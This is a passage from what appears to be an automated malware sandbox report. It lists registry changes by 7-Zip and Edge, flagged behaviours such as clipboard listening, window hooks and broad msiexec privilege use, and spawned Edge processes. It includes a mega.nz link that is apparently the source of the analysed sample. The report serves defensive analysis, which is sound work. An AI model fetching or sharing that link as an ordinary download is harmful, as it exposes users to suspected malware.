| Set value (data) | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.rar\shell | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Pictures" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\.7z\ = "7-Zip.7z" | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.7z\DefaultIcon\ = "C:\\Program Files\\7-Zip\\7z.dll,0" | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.zip\shell | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.lzma\ = "lzma Archive" | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.tar\shell\open\ | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.bz2\shell\ | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.7z\shell | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\.7z | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.rar\shell\open\command | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.xz\shell\open\command | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_CLASSES\7-ZIP.TAR\SHELL\OPEN\COMMAND | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Downloads" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.zip\ = "zip Archive" | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.zip\DefaultIcon\ = "C:\\Program Files\\7-Zip\\7z.dll,1" | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.zip\shell\open\command\ = "\"C:\\Program Files\\7-Zip\\7zFM.exe\" \"%1\"" | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.cab\DefaultIcon | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_CLASSES\7-ZIP.7Z\SHELL\OPEN\COMMAND | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.txz\ = "txz Archive" | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\desktop-1920x1080.jpg:Zone.Identifier | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\desktop-1920x1080.jpg:Zone.Identifier | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\desktop-1920x1080 (1).jpg:Zone.Identifier | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeRestorePrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: 35 | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: 35 | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreateTokenPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeMachineAccountPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeCreatePermanentPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeChangeNotifyPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeSyncAgentPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeEnableDelegationPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeImpersonatePrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeCreateGlobalPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://mega.nz/file/CUt1QDyR#n6vgudTHTYgM_mZuot-SW_zmhiqVQXzqt_2RFi4uTMM
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xd8,0x100,0x104,0xe4,0x108,0x7ffb3f8746f8,0x7ffb3f874708,0x7ffb3f874718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2296 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=2200 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --service-sandbox-type=utility --mojo-platform-channel-handle=2872 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5020 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4692 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3796 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --service-sandbox-type=collections --mojo-platform-channel-handle=5268 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=5808 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=5808 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5896 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5844 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --service-sandbox-type=audio --mojo-platform-channel-handle=5084 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --service-sandbox-type=video_capture --mojo-platform-channel-handle=5812 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5888 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6040 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=5636 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3404 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=6316 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x340 0x344
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5376 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=6256 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5204 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5560 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5460 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6244 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5564 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6248 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6016 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5396 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --service-sandbox-type=collections --mojo-platform-channel-handle=6672 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=6800 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6864 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3504 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4040 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
